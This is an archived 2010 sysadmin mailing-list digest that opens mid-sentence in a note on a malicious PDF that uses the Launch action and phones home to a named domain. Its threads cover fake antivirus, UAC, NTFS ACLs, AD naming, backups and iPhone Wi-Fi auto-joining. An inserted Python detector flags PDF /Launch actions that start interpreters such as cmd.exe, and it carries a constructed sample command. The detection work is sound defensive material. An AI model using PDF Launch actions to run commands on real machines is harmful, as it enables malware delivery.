Options\explorer.exe", and because it phones home to (currently) jademason.com.

Adobe has said that the Launch functionality is a feature, not a bug. Adobe is 
looking into the issue, but has not said what action, if any, they intended to 
take to mitigate the danger. Their post on the matter does include directions 
for turning off this functionality.

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA
Network Engineer
Lifespan Organization
401-639-3505
ezi...@lifespan.org


-Original Message-
From: Stu Sjouwerman [mailto:s...@sunbelt-software.com] 
Sent: Wednesday, April 28, 2010 4:17 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Erm, There are 115 known strains (and growing fast) of malwar
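
A defender-side check for the Launch action dissected in the writeup above, as an added example that is not part of the original post or the Secureworks analysis: it scans raw PDF bytes for /S /Launch actions, decodes #xx name escapes, and reports the /F target and /P parameters. The sample bytes, function names and flag labels are constructed for illustration, and compressed object streams are not inflated.

```python
import re

# Interpreters that a document's /Launch action has no business starting.
SHELLS = {b"cmd.exe", b"cscript.exe", b"wscript.exe", b"powershell.exe"}
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)(?:endobj|\Z)", re.S)
NAME_RE = re.compile(rb"/[^\s/<>\[\]()%]+")


def _normalize_names(body):
    """Decode #xx escapes inside PDF names so /L#61unch compares as /Launch."""
    def fix(m):
        return re.sub(rb"#([0-9A-Fa-f]{2})",
                      lambda h: bytes([int(h.group(1), 16)]), m.group())
    return NAME_RE.sub(fix, body)


def _read_literal(data, start):
    """Read the PDF literal string whose '(' is at data[start].

    Handles nested parentheses and backslash escapes (simplified: the escaped
    character is kept as-is). A string cut off before its ')' is returned as far
    as it goes, which is what a truncated or malformed object needs.
    """
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        ch = data[i:i + 1]
        if ch == b"\\" and i + 1 < len(data):
            out += data[i + 1:i + 2]
            i += 2
            continue
        if ch == b"(":
            depth += 1
            if depth > 1:
                out += ch
        elif ch == b")":
            depth -= 1
            if depth == 0:
                return bytes(out), i + 1
            out += ch
        else:
            out += ch
        i += 1
    return bytes(out), len(data)


def _literal_after(body, key):
    """Return the literal string that follows name /<key>, or None."""
    m = re.search(rb"/" + key + rb"\s*\(", body)
    return _read_literal(body, m.end() - 1)[0] if m else None


def scan_pdf(data):
    """Report every /Launch action and whether the 'SS / 'EE comment tags appear."""
    actions = []
    for m in OBJ_RE.finditer(data):
        body = _normalize_names(m.group(3))
        if not re.search(rb"/S\s*/Launch(?![A-Za-z0-9])", body):
            continue
        target = _literal_after(body, b"F") or b""
        params = _literal_after(body, b"P") or b""
        flags = []
        if target.replace(b"\\", b"/").rsplit(b"/", 1)[-1].lower() in SHELLS:
            flags.append("launches-interpreter")
        if re.search(rb"\.(vbs|js|bat|cmd)\b", params, re.I):
            flags.append("stages-script")
        actions.append({"object": int(m.group(1)),
                        "target": target.decode("latin-1"),
                        "params": params.decode("latin-1"),
                        "flags": flags})
    # Tags the writeup says delimit the section carved out of doc.pdf.
    markers = b"%'SS" in data and b"%'EE" in data
    return {"launch_actions": actions, "ss_ee_markers": markers}


# Constructed, harmless sample: one Launch action (with an escaped name),
# one ordinary URI action, and an empty tagged comment section.
SAMPLE = (
    b"%PDF-1.4\n"
    b"5 0 obj\n<< /Length 20 >>\nstream\nBT (hello) Tj ET\n"
    b"%'SS\n%constructed\n%'EE\nendstream\nendobj\n"
    b"8 0 obj\n<< /Type /Action /S /L#61unch /Win << /F (cmd.exe) "
    b"/P (/c echo constructed-sample > note.vbs) >> >>\nendobj\n"
    b"9 0 obj\n<< /Type /Action /S /URI /URI (http://example.invalid/) >>\nendobj\n"
)

if __name__ == "__main__":
    print(scan_pdf(SAMPLE))
```
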

Re: Admin rights, UAC, etc. (was: WTF? Fake AV)

2010-04-28 Thread Jon Harris
" With the exception of exploitation of unpatched vulnerabilities,
I've never seen malware lead to a system compromise on a
properly-secured Win XP machine"

Sorry but how many (l)users know how to do this?  How many home owners even
know this is possible?  I would much rather see a Windows Vista with UAC
turned on or Windows 7 in one of their hands than the typical XP box.  You
can teach people not to click Okay or Yes and then call and ask or just go
on without allowing the security holes.  Yes it is hard to do and no you
sometimes have to make it hurt to get their attention but like James says
charge them more each time they bring in a corrupted system and the pain
will cause them to start using their heads.

On Wed, Apr 28, 2010 at 11:13 AM, Ben Scott  wrote:

> On Wed, Apr 28, 2010 at 10:18 AM,   wrote:
> > Are there any reports out there that show Windows 7 running with UAC that
> > its minimizes the infections of spyware.
>
>  I too would be interested in seeing hard data on this.  I've seen
> lots of marketing claims, and the occasional anecdote, but I remain
> unconvinced that UAC (as typically configured, and for the SOHO user)
> will do anything more than train lusers to click "Allow" when they see
> it.  I've certainly got my own anecdotal evidence that lusers do just
> that.
>
>  To me, the chief advantage to UAC is FRV (filesystem and registry
> virtualization).  It lets software which thinks it needs to write to
> protected locations run anyway.  *That's* a big win.  Lets people who
> understand security cope with software vendors who don't.
>
>  The ability for UAC to use the GUI to prompt for alternate admin
> credentials for privilege elevation is very convenient, but it's not
> compelling to me.  You can achieve similar results using RUNAS.  Not
> as convenient, but gets the job done.
>
> > While I am not a huge fan of MACS ...
>
>  It took me a minute to figure out you meant "Macintoshes" and not
> "Mandatory Access Control System".  "Mac" -- the computer from Apple
> -- is not an acronym.  :)
>
>  (It wouldn't have been so confusing except that MACS and DACS are
> the two common models used for describing access control/permissions.
> Windows mostly uses DACS (hence, DACL, Discretionary Access Control
> List), but the "Integrity Levels" features in Win 6.x are heading in
> the direction of MACS.)
>
> > .. their security model is obviously much better than Windows.
>
>  While Windows is often shipped with a default no-security admin
> account, Windows fully supports creating a user without admin rights.
> It's what we do for *everybody* here at %WORK%.  We've been doing it
> for *years*, and it works very well.
>
>  The only hard part is convincing software vendors that admin rights
> are not required to do things like word processing.
>
>  More generally, one problem is the many PC builders who ship their
> computers configured to run users as admins by default.  Even if UAC
> works as advertised, that's not a good thing.
>
>  But the real hard problem here is home lusers who don't understand
> security.  They consider security a problem, something to be removed.
> And they will install whatever a web page tells them to.  I don't have
> a good solution for that.  I suspect nobody does.
>
> > Even with users not in admin group in Windows XP, Vista I have
> > seen malware get right on and hose a machine.
>
>  With the exception of exploitation of unpatched vulnerabilities,
> I've never seen malware lead to a system compromise on a
> properly-secured Win XP machine.
>
>  I've seen it screw up a user account pretty well, to the point where
> it's easier to erase and reset the user profile than it is to repair
> the registry wreckage.  Most of the time, though, all we have to do is
> login as an admin and delete *.EXE *.DLL *.OCX under their user
> profile folder.
>
>  Are you using a proper set of ACLs on the filesystem?  My strategy
> is that users should only be able to create/modify under their own
> user profile folder.  Nothing else.  Well, the default C:\WINDOWS\TEMP
> permissions are okay.
>
>  In particular, by default, users can create files and folders under
>  and .
> This is a very bad idea on Microsoft's part.  Malware gets in,
> compromises "All Users", admin logs in, Explorer or something else
> trips over something in "All Users", malware now compromises system.
> Way to go Microsoft!
>
> -- Ben

RE: WTF? Fake AV

2010-04-28 Thread Mayo, Bill
Not sure what point you are disputing but 115 (total) versus 70,000 per day 
(your numbers from earlier today) is kind of lopsided.  I'm not saying that 115 
isn't enough to worry about, but if 115 in 8 years is "growing fast", what in 
the world do you call 70,000 per day?!?!

-Original Message-
From: Stu Sjouwerman [mailto:s...@sunbelt-software.com] 
Sent: Wednesday, April 28, 2010 4:17 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Erm, There are 115 known strains (and growing fast) of malware for the Mac. 
That's why we are releasing a VIPRE client for the Mac in Q2. They have sold 
enough machines to make it attractive for cyber crime to go after. All security 
models will break as per the principle of the 'bigger hammer'. 

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 4:10 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

And you are making the (rather dramatic, IMO) over generalization that 
Microsoft simply tells app vendors what to do and expects them to move at the 
drop of a hat.

The reality is that MS has typically bent over backwards to ensure backwards 
compatibility (to a fault you may argue) for applications wherever possible. 
That has been one of the tenets of their OS design since Windows had DOS boxes.

They have compatibility flags within the OS to special case specific apps and 
installers. They have wow32 and wow64. They did FX!32 on Alpha.
They've supported old versions of APIs along with new versions. They allow 
unsigned hardware even though the new model requires signed hardware. Etc, 
etc...

Heck, up until Vista you could still run something from 20 yr old DOS..

Now would they LIKE apps vendors to comply with new direction day1? Yes.
Do they all? No. So there is much notification, suggestion, development 
guidelines, DevCons, etc... to shepherd app vendors the right direction.

Your "MS simply flips a switch and expects devs to comply" sentiment  is an 
inaccurate oversimplification.

-sc

> -Original Message-
> From: Ben Scott [mailto:mailvor...@gmail.com]
> Sent: Wednesday, April 28, 2010 3:57 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
> 
> On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare wrote:
> > A) hardware driver models are a somewhat different beast, and that's
> > held true for many a platform, and isn't really germane to what we are
> > discussing here.
> 
>   The only point I was making (and the one you're determined to ignore, it
> appears): Microsoft routinely throws their weight around to tell the rest of
> the industry to change to Microsoft's new way of doing things.  Microsoft
> elected not to do that with security.
> 
>   The question was asked (paraphrased): "Why did it take Microsoft so long to
> do anything about security?"  I answered that question.  No less, no more.
> You're the one who keeps trying to drag the question off into the weeds.
> 
>   Of course, an equally valid question would be, "Why did it take Apple so
> long to do anything about security?"  But that wasn't the question I was
> addressing.
> 
> > Using AV infection #'s to compare those things and draw the conclusion
> > he did is not accurate, IMO.
> 
>   That I would agree with.
> 
> -- Ben
> 



Re: Ink & toner "cold callers"

2010-04-28 Thread Jon Harris
There is a national list maintained by the feds for whatever use it is.  I
thought the price of a mistake was much higher but hey $200 per call if I
got it would be worth the time to get their number recorded and reported to
the feds.  I wonder who gets the money; sure ain't us.

Jon

On Tue, Apr 27, 2010 at 6:21 PM, Ben Scott  wrote:

> On Tue, Apr 27, 2010 at 1:52 PM, Mayo, Bill wrote:
> > At least in the world of nuisance calls, "take me off your list" does no
> > good.  As I understand it, federal law requires telemarketers to maintain a
> > "do not call list" and you have to ask to be added to that.
>
>  Mr. Mayo is correct.  The magic words are "do-not-call list".
>
>  Even if they were obligated to take your number off some list, they
> buy/sell lists constantly.  You'd get right back on it.
>
>  But for residences, telemarketers are legally obligated to maintain
> a do-not-call list, put the number on it at your request, and maintain
> your listing for ten years.
>
>  Give them all your phone numbers, and get the name of the person,
> the name of the business, the correspondence address, and make note of
> the date and time.  You can collect penalties to the tune of something
> like $200 per violation.
>
>  The do-not-call regulations do not apply to businesses, but many
> telemarketers don't attempt to make the distinction, because making a
> mistake can be costly.
>
>  More information: http://www.fcc.gov/cgb/donotcall/
>
> -- Ben

RE: Webster is now employed

2010-04-28 Thread Stu Sjouwerman
Very Well Done!

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com




From: Webster [mailto:webs...@carlwebster.com]
Sent: Tuesday, April 27, 2010 10:06 PM
To: NT System Admin Issues
Subject: Webster is now employed

Webster is now employed by LPS Integration in Nashville, TN as Sr. Citrix 
Technical Architect.  I start Friday May 7th. http://www.lpsintegration.com/


Carl Webster
Citrix Technology Professional
http://dabcc.com/Webster






...


RE: WTF? Fake AV

2010-04-28 Thread Stu Sjouwerman
Erm, There are 115 known strains (and growing fast) of malware 
for the Mac. That's why we are releasing a VIPRE client for the 
Mac in Q2. They have sold enough machines to make it attractive
for cyber crime to go after. All security models will break as
per the principle of the 'bigger hammer'. 

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com] 
Sent: Wednesday, April 28, 2010 4:10 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

And you are making the (rather dramatic, IMO) over generalization that
Microsoft simply tells app vendors what to do and expects them to move
at the drop of a hat.

The reality is that MS has typically bent over backwards to ensure
backwards compatibility (to a fault you may argue) for applications
wherever possible. That has been one of the tenets of their OS design
since Windows had DOS boxes.

They have compatibility flags within the OS to special case specific
apps and installers. They have wow32 and wow64. They did FX!32 on Alpha.
They've supported old versions of APIs along with new versions. They
allow unsigned hardware even though the new model requires signed
hardware. Etc, etc...

Heck, up until Vista you could still run something from 20 yr old DOS..

Now would they LIKE apps vendors to comply with new direction day1? Yes.
Do they all? No. So there is much notification, suggestion, development
guidelines, DevCons, etc... to shepherd app vendors the right direction.

Your "MS simply flips a switch and expects devs to comply" sentiment  is
an inaccurate oversimplification.

-sc

> -Original Message-
> From: Ben Scott [mailto:mailvor...@gmail.com]
> Sent: Wednesday, April 28, 2010 3:57 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
> 
> On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare wrote:
> > A) hardware driver models are a somewhat different beast, and that's
> > held true for many a platform, and isn't really germane to what we are
> > discussing here.
> 
>   The only point I was making (and the one you're determined to ignore, it
> appears): Microsoft routinely throws their weight around to tell the rest of
> the industry to change to Microsoft's new way of doing things.  Microsoft
> elected not to do that with security.
> 
>   The question was asked (paraphrased): "Why did it take Microsoft so long to
> do anything about security?"  I answered that question.  No less, no more.
> You're the one who keeps trying to drag the question off into the weeds.
> 
>   Of course, an equally valid question would be, "Why did it take Apple so
> long to do anything about security?"  But that wasn't the question I was
> addressing.
> 
> > Using AV infection #'s to compare those things and draw the conclusion
> > he did is not accurate, IMO.
> 
>   That I would agree with.
> 
> -- Ben
> 



RE: WTF? Fake AV

2010-04-28 Thread Steven M. Caesare
And you are making the (rather dramatic, IMO) over generalization that
Microsoft simply tells app vendors what to do and expects them to move
at the drop of a hat.

The reality is that MS has typically bent over backwards to ensure
backwards compatibility (to a fault you may argue) for applications
wherever possible. That has been one of the tenets of their OS design
since Windows had DOS boxes.

They have compatibility flags within the OS to special case specific
apps and installers. They have wow32 and wow64. They did FX!32 on Alpha.
They've supported old versions of APIs along with new versions. They
allow unsigned hardware even though the new model requires signed
hardware. Etc, etc...

Heck, up until Vista you could still run something from 20 yr old DOS..

Now would they LIKE apps vendors to comply with new direction day1? Yes.
Do they all? No. So there is much notification, suggestion, development
guidelines, DevCons, etc... to shepherd app vendors the right direction.

Your "MS simply flips a switch and expects devs to comply" sentiment  is
an inaccurate oversimplification.

-sc

> -Original Message-
> From: Ben Scott [mailto:mailvor...@gmail.com]
> Sent: Wednesday, April 28, 2010 3:57 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
> 
> On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare wrote:
> > A) hardware driver models are a somewhat different beast, and that's
> > held true for many a platform, and isn't really germane to what we are
> > discussing here.
> 
>   The only point I was making (and the one you're determined to ignore, it
> appears): Microsoft routinely throws their weight around to tell the rest of
> the industry to change to Microsoft's new way of doing things.  Microsoft
> elected not to do that with security.
> 
>   The question was asked (paraphrased): "Why did it take Microsoft so long to
> do anything about security?"  I answered that question.  No less, no more.
> You're the one who keeps trying to drag the question off into the weeds.
> 
>   Of course, an equally valid question would be, "Why did it take Apple so
> long to do anything about security?"  But that wasn't the question I was
> addressing.
> 
> > Using AV infection #'s to compare those things and draw the conclusion
> > he did is not accurate, IMO.
> 
>   That I would agree with.
> 
> -- Ben
> 



Re: Anyone Used Zmanda backup?

2010-04-28 Thread justino garcia
Thanks JOE,

Thank You

On Wed, Apr 28, 2010 at 3:33 PM, Joseph L. Casale  wrote:

> >Thanks
> >Does Bacula offer support.
>
> yup, they have an enterprise edition as well...
>
> >Does bacula take file / database backups, or Image based.
>
> It can be designed to do anything, for example I use a "RunBefore Script"
> to do some osql and ntbackup commands that create the files I will
> immediately backup after. It also can use VSS.
>
> >Does it require a Linux box.
>
> But of course:) There are windows clients however.
>
> >can it do off-site, how about rotation/Retention  rules (how long, and how
> >to remove older backups).
>
> It does whatever you define in the configs, and yes it can be set to do
> offsite.
>
> >Alerts if it needs to be checked?
>
> Yup, and the granularity is configurable...


-- 
Justin
IT-TECH


Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread Ben Scott
On Wed, Apr 28, 2010 at 1:30 PM, Crawford, Scott  wrote:
> MoveSecurityAttributes
> http://support.microsoft.com/kb/310316

  Ah, that looked very promising for a moment.  But then I saw what
Bill Mayo saw: It apparently requires permission to modify the ACL,
and we don't allow that.

  It's also apparently an attempt to work around an NTFS bug in
Windows Explorer, so it won't work for anything that doesn't use
Explorer to move files.  Granted, for our users, that would do the
trick, but I still have to wonder why they don't just fix NTFS...
/grumble

-- Ben



RE: Current AD domain naming best practices

2010-04-28 Thread David Lum
For what I do, I see no differences between the three. I do not deal with certs 
however which I imagine would be where I would see it the most. Only the 
subdomain location might ever need to use ADFS.

Dave

-Original Message-
From: Joseph Heaton [mailto:jhea...@dfg.ca.gov] 
Sent: Wednesday, April 28, 2010 7:59 AM
To: NT System Admin Issues
Subject: RE: Current AD domain naming best practices

David,

Could you profile the differences in managing each of these?  Is one "easier" 
than the others?

>>> David Lum  4/28/2010 7:49 AM >>>
%dayjob% does sub-domain as well, one of my clients I have .local (they are 
ci.cornelius.or.us on the outside anyhow), and another client is same 
inside/outside (I inherited this setup).

Dave

-Original Message-
From: Jacob [mailto:ja...@excaliburfilms.com] 
Sent: Wednesday, April 28, 2010 7:42 AM
To: NT System Admin Issues
Subject: RE: Current AD domain naming best practices

What we use... sub-domain. Have had no issues for years.

-Original Message-
From: Michael B. Smith [mailto:mich...@smithcons.com] 
Sent: Wednesday, April 28, 2010 7:31 AM
To: NT System Admin Issues
Subject: RE: Current AD domain naming best practices

This will _KILL_ you if you ever need to deploy ADFS.

Best practice is to use a sub-domain (i.e., ad.example.com) of your external
domain.

Regards,

Michael B. Smith
Consultant and Exchange MVP
http://TheEssentialExchange.com 


-Original Message-
From: John Aldrich [mailto:jaldr...@blueridgecarpet.com] 
Sent: Wednesday, April 28, 2010 10:30 AM
To: NT System Admin Issues
Subject: RE: Current AD domain naming best practices

My understanding is the same as your Novell admin's: keep the two separate,
i.e. businessname.com for external and businessname.local for internal.




-Original Message-
From: Joseph Heaton [mailto:jhea...@dfg.ca.gov] 
Sent: Wednesday, April 28, 2010 10:22 AM
To: NT System Admin Issues
Subject: Current AD domain naming best practices

We are currently in the beginning phases of migrating from Novell
e-Directory, to AD.  We are having discussions to decide on a new internal
domain name.  I know that years ago, it was best practice to have a
different internal domain name from your external domain name, which is what
the Novell guy is holding onto, like a pitbull to a mailman's leg.  Is that
still true today?  We are on private IPs internally, so external forces
can't route to the inside anyway, so my thinking, and the other Windows
admins, is that having the same FQDN internally would be ok.

TIA,

Joe





Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread Ben Scott
On Wed, Apr 28, 2010 at 12:55 PM, James Rankin  wrote:
> I don't know whether removing Creator Owner from the ACL actually updates or
> changes the owner in any way.

  It doesn't change the owner, but that doesn't matter.  "CREATOR
OWNER" is a magic ACE that turns into whatever the owner is/was set to
when the ACL is applied.  Simply remove the "CREATOR OWNER" ACE and
avoid the problem entirely.

  Why are you using "CREATOR OWNER" in an ACL in the first place?  I
think that's your problem.

> For preserving (or not) permissions on file moves, I find robocopy is the
> way forward ...

  Two problems with that: (1) Requires permission to set the ACL.  (2)
Asking your typical user to use ROBOCOPY to move files is ridiculous.

-- Ben



RE: Anyone see a problem?

2010-04-28 Thread David Lum
Huh, I learned something new. Thanks everyone.

Dave

From: John Aldrich [mailto:jaldr...@blueridgecarpet.com]
Sent: Wednesday, April 28, 2010 12:46 PM
To: NT System Admin Issues
Subject: RE: Anyone see a problem?

Yep. I have several access point / routers set up with the same security 
settings and ID and my laptop will automatically connect to them.


From: Steve Ens [mailto:stevey...@gmail.com]
Sent: Wednesday, April 28, 2010 3:28 PM
To: NT System Admin Issues
Subject: Re: Anyone see a problem?

In my experience, if you have two WAPs setup with the same name and the same 
security settings, the device will connect automatically.
On Wed, Apr 28, 2010 at 2:25 PM, Mayo, Bill <bem...@pittcountync.gov> wrote:
Is this unique?  In other words, if you connect to a wi-fi network named 
"linksys" (rare, I know) with pretty much any device and then come within range 
of a different network named "linksys" will it automatically connect?  I am 
asking because I honestly don't know.  For me, it's a bigger question of being 
aware of how your device is configured and from where you are getting your 
internet access.


From: David Lum [mailto:david@nwea.org]
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?
"Typically, an iPhone will look for a specific MAC address--the unique 
identifier for the router--to verify that the wireless network is a device a 
user agreed to join previously. However, if the iPhone has previously connected 
to any one of the numerous free AT&T Wi-Fi hot spots (offered at virtually 
every Starbucks in the U.S., for example) the device will ignore what the MAC 
address says and simply connect to the network if it has "AT&T Wifi" attached, 
Kamkar said".

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title
David Lum // SYSTEMS ENGINEER
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764

Re: WTF? Fake AV

2010-04-28 Thread Ben Scott
On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare
 wrote:
> A) hardware driver models are a somewhat different beast, and that's
> held true for many a platform, and isn't really germane to what we are
> discussing here.

  The only point I was making (and the one you're determined to
ignore, it appears): Microsoft routinely throws their weight around to
tell the rest of the industry to change to Microsoft's new way of
doing things.  Microsoft elected not to do that with security.

  The question was asked (paraphrased): "Why did it take Microsoft so
long to do anything about security?"  I answered that question.  No
less, no more.  You're the one who keeps trying to drag the question
off into the weeds.

  Of course, an equally valid question would be, "Why did it take
Apple so long to do anything about security?"  But that wasn't the
question I was addressing.

> Using AV infection #'s to compare those things and draw the conclusion
> he did is not accurate, IMO.

  That I would agree with.

-- Ben



Re: Current AD domain naming best practices

2010-04-28 Thread Joseph Heaton
I'm simply gathering information on the 3 options, and what everyone 
recommends.  Unfortunately, there is no clear-cut "winner".  I've found that 
all 3 are valid options, depending on how much administrative overhead you want 
to add to the process.  However, Michael Smith brought up a rather strong 
concern over why different names would be bad, if you're possibly going to 
implement ADFS.

Anyway, I very much appreciate your, and everyone's, input.

Joe

>>> "Andrew S. Baker"  4/28/2010 12:33 PM >>>
A subdomain is fine, but suffers many of the same drawbacks as using a
single DNS namespace.

And you're involving more DNS servers into the resolution process for what
purpose again?

-ASB: http://XeeSM.com/AndrewBaker 

Sent from my Motorola Droid

On Apr 28, 2010 12:51 PM, "Joseph Heaton"  wrote:

Andrew,

So you don't recommend the subdomain?  Also, if you could expand on your
answer, it'd be great, as I'm bringing all ideas to a meeting this
afternoon, with pros/cons behind each option.

>>> "Andrew S. Baker"  4/28/2010 8:55 AM >>>

Use two separate domain names, even if you register the internal one.

You can avoid all manner of p...
the Novell guy is saying.  Is that

still true today? We are on private IPs internally, so external forces
can't route to the inside an...




Re: Outlook 2K3 as non admin (was RE: WTF? Fake AV)

2010-04-28 Thread Ben Scott
On Wed, Apr 28, 2010 at 1:19 PM, David Lum  wrote:
> ... I have Outlook 2003 working for non-admins and have for some years now.

  Same here.  We've been running Outlook 2003 without admin rights
since it was released.  Come to think of it, I'm not sure I've *ever*
run Outlook 2003 as an admin, even for installation.

-- Ben



RE: Anyone see a problem?

2010-04-28 Thread Maglinger, Paul
Or $1.50 for a bottle of water?!?

 

From: Don Guyer [mailto:don.gu...@prufoxroach.com] 
Sent: Wednesday, April 28, 2010 2:23 PM
To: NT System Admin Issues
Subject: RE: Anyone see a problem?

 

Yes I do! Who, in their right mind, pays $5 for a cup of coffee?!

 

:)

 

Don Guyer

Systems Engineer - Information Services

Prudential, Fox & Roach/Trident Group

431 W. Lancaster Avenue

Devon, PA 19333

Direct: (610) 993-3299

Fax: (610) 650-5306

don.gu...@prufoxroach.com

 

From: David Lum [mailto:david@nwea.org] 
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?

 

"Typically, an iPhone will look for a specific MAC address--the unique
identifier for the router--to verify that the wireless network is a
device a user agreed to join previously. However, if the iPhone has
previously connected to any one of the numerous free AT&T Wi-Fi hot
spots (offered at virtually every Starbucks in the U.S., for example)
the device will ignore what the MAC address says and simply connect to
the network if it has "AT&T Wifi" attached, Kamkar said".

 

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title

David Lum // SYSTEMS ENGINEER 
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764

 

 

 

 

 


RE: Anyone see a problem?

2010-04-28 Thread Steven M. Caesare
You misspelled "opportunity".

 

-sc

 

From: David Lum [mailto:david@nwea.org] 
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?

 

"Typically, an iPhone will look for a specific MAC address--the unique
identifier for the router--to verify that the wireless network is a
device a user agreed to join previously. However, if the iPhone has
previously connected to any one of the numerous free AT&T Wi-Fi hot
spots (offered at virtually every Starbucks in the U.S., for example)
the device will ignore what the MAC address says and simply connect to
the network if it has "AT&T Wifi" attached, Kamkar said".

 

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title

David Lum // SYSTEMS ENGINEER 
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764

 

 

 


Re: Dell MD1000

2010-04-28 Thread Anders Blomgren
The MD1000 is just a SAS enclosure without any controller at all. Are you
asking about the MD3000 or the Perc6 raid card that actually drives an
MD1000?

-Anders

On Wed, Apr 28, 2010 at 9:33 PM, Richard Stovall  wrote:

> Anyone have one (or more) of the Dell MD1000s?  Any comments, good or ill?
>
> I'm thinking about creating a new file server and this is a relatively
> inexpensive option from a big vendor.
>
> Thanks,
> RS

RE: Anyone see a problem?

2010-04-28 Thread John Aldrich
Yep. I have several access point / routers set up with the same security
settings and ID and my laptop will automatically connect to them.

 


 

From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 3:28 PM
To: NT System Admin Issues
Subject: Re: Anyone see a problem?

 

In my experience, if you have two WAPs setup with the same name and the same
security settings, the device will connect automatically.  

On Wed, Apr 28, 2010 at 2:25 PM, Mayo, Bill  wrote:

Is this unique?  In other words, if you connect to a wi-fi network named
"linksys" (rare, I know) with pretty much any device and then come within
range of a different network named "linksys" will it automatically connect?
I am asking because I honestly don't know.  For me, it's a bigger question
of being aware of how your device is configured and from where you are
getting your internet access.

 


From: David Lum [mailto:david@nwea.org] 
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?

"Typically, an iPhone will look for a specific MAC address--the unique
identifier for the router--to verify that the wireless network is a device a
user agreed to join previously. However, if the iPhone has previously
connected to any one of the numerous free AT&T Wi-Fi hot spots (offered at
virtually every Starbucks in the U.S., for example) the device will ignore
what the MAC address says and simply connect to the network if it has "AT&T
Wifi" attached, Kamkar said".

 

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title

David Lum // SYSTEMS ENGINEER 
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764

Dell MD1000

2010-04-28 Thread Richard Stovall
Anyone have one (or more) of the Dell MD1000s?  Any comments, good or ill?

I'm thinking about creating a new file server and this is a relatively
inexpensive option from a big vendor.

Thanks,
RS


RE: Anyone Used Zmanda backup?

2010-04-28 Thread Joseph L. Casale
>Thanks
>Does Bacula offer support.

yup, they have an enterprise edition as well...

>Does bacula take file / database backups, or Image based.

It can be designed to do anything, for example I use a "RunBefore Script" to do some
osql and ntbackup commands that create the files I will immediately backup after. It
also can use VSS.

>Does it require a Linux box.

But of course:) There are windows clients however.

>can it do off-site, how about rotation/Retention  rules (how long, and how to 
>remove older backups).

It does whatever you define in the configs, and yes it can be set to do offsite.

>Alerts if it needs to be checked?

Yup, and the granularity is configurable...




Re: Current AD domain naming best practices

2010-04-28 Thread Andrew S. Baker
A subdomain is fine, but suffers many of the same drawbacks as using a
single DNS namespace.

And you're involving more DNS servers into the resolution process for what
purpose again?

-ASB: http://XeeSM.com/AndrewBaker

Sent from my Motorola Droid

On Apr 28, 2010 12:51 PM, "Joseph Heaton"  wrote:

Andrew,

So you don't recommend the subdomain?  Also, if you could expand on your
answer, it'd be great, as I'm bringing all ideas to a meeting this
afternoon, with pros/cons behind each option.

>>> "Andrew S. Baker"  4/28/2010 8:55 AM >>>

Use two separate domain names, even if you register the internal one.

You can avoid all manner of p...
the Novell guy is saying.  Is that

still true today? We are on private IPs internally, so external forces
can't route to the inside an...


Re: Anyone Used Zmanda backup?

2010-04-28 Thread justino garcia
Thanks
Does Bacula offer support.
Does bacula take file / database backups, or Image based.
Does it require a Linux box.
can it do off-site, how about rotation/Retention  rules (how long, and how
to remove older backups).
Alerts if it needs to be checked?
On Wed, Apr 28, 2010 at 2:22 PM, Joseph L. Casale  wrote:

>  I used to use the Enterprise version, it lacked some trivial features
> like an automated verify and the html based console was not all that
> friendly.
>
> I use Bacula in a mixed environment now…
>
> I like it much better.
>
>
>
> *From:* justino garcia [mailto:jgarciaitl...@gmail.com]
> *Sent:* Wednesday, April 28, 2010 11:59 AM
>
> *To:* NT System Admin Issues
> *Subject:* Anyone Used Zmanda backup?
>
>
>
> Anyone using Zmanda in production, how good is it?
>
> Have you tested a recovery, how does it handle retention policies? And
> would you recommend it for off-site backups?
>
> thanks
>
> --
> Justin
> IT-TECH


-- 
Justin
IT-TECH


Re: Anyone see a problem?

2010-04-28 Thread Steve Ens
In my experience, if you have two WAPs setup with the same name and the same
security settings, the device will connect automatically.

On Wed, Apr 28, 2010 at 2:25 PM, Mayo, Bill  wrote:

>  Is this unique?  In other words, if you connect to a wi-fi network named
